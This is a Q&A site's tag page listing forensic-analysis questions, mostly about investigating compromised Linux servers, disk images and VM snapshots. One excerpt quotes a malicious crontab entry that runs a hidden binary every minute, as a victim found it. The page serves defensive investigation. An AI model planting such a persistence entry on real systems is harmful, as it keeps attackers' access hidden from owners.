Questions tagged [forensic-analysis]
12 questions
15
votes
8 answers
What are main steps doing forensic analysis of linux box after it was hacked?
What are main steps doing forensic analysis of linux box after it was hacked?
Lets say it is a generic linux server mail/web/database/ftp/ssh/samba. And it started sending spam, scanning other systems.. How to start searching for ways hack was done…
Kazimieras Aliulis
- 2,324
- 2
- 26
- 45
10
votes
2 answers
My linux server was hacked. How do I find out how and when it was done?
I have a home server running a desktop ubuntu distribution. I found this in my crontab
* * * * * /home/username/ /.access.log/y2kupdate >/dev/null 2>&1
and when looking in that directory (the space after username/ is a directory name) I found a lot…
Jonatan Kallus
- 203
- 2
- 6
4
votes
1 answer
How to disable automatic garbage collection on an SSD?
Solid State Drives (SSD) have a garbage collection functionality which makes space from deleted files available. It is triggered
automatically by the drive
via a TRIM command sent by the OS
Is there a way to put an SSD in a state where the…
WoJ
- 3,365
- 8
- 46
- 75
4
votes
2 answers
Virtual machine memory space forensics
in spite of the fact that the main point of virtualization is having "containerized" environments for every instanced OS without sharing memory space, are there techniques to make forensics on either online or offline (paused) virtual…
bbanelli
- 41
- 5
2
votes
2 answers
Sending ESXi Snapshot to 3rd party forensics team
We recently had a couple security events occur and we immediately took a snapshot of the VM as we wanted to preserve as much of the data as we could. Now we would like to send it to a 3rd party forensics team to determine the level of compromise.
My…
brittonballard
- 31
- 4
1
vote
1 answer
Finding email read times on exchange server
I'm trying to do a forensic analysis on an exchange server, and I'd like to determine what time a user read a particular email. Is there any way - perhaps with a tool like mfcmapi or another open source or commercial tool that can provide this…
Shmuel Levine
- 113
- 3
1
vote
2 answers
What are my options with a downloaded Rackspace cloud image?
I've got an unresponsive Rackspace slice that has defied all attempts at accessing. I created an emergency image from this and deleted it, downloading the files that compromise the image to a local source. There are a number of files / assets I…
schnippy
- 141
- 6
0
votes
1 answer
Examine contents of unused space on the HDD
When using managed dedicated services, either virtual or physical, where you're presented with complete control to an operating system installed on some piece of hardware you don't have physical access to, is there any good way to test whether the…
cnst
- 12,948
- 7
- 51
- 75
0
votes
2 answers
How can I analyze an encrypted HDD?
I have a HDD which I encrypted few years ago but I can't remember the tool I used. How can I find out if I have used TrueCrypt or VeraCrypt to encrypt my hard drive?
Thanks.
user3646958
- 9
- 1
0
votes
2 answers
What logs should I check after a break-in?
I've asked this same question on superuser but I didn't have that much succes. I'd like to learn more about forensic analysis, and I'm doing the challenges from Project Honeynet. I need to check the logfiles and see the IP's that connected remote to…
Geo
- 157
- 7
0
votes
3 answers
How to mount the dd image of a swap file
I have several dd images from a single drive. One of them is the swap. I mounted all of the images in Ubuntu just fine except for the image of the swap. This is how the dd images break down: hda8 is /, hda1 is /boot, hda6 is /home, hda5 is /usr,…
Todd7912
- 3
- 3
0
votes
1 answer
Is there a (forensic) way to list past events/actions of a certain *.exe malware program (PUP-Proxygate, possibly a Trojan)?
There is a folder with suspicious *.exe files on a Win 10 PC, and there are (external) protocols of potentially unlawful actions coming from that PC at a certain time in the past. The first suspicious action was network traffic to a sinkhole IP…
David.P
- 119
- 5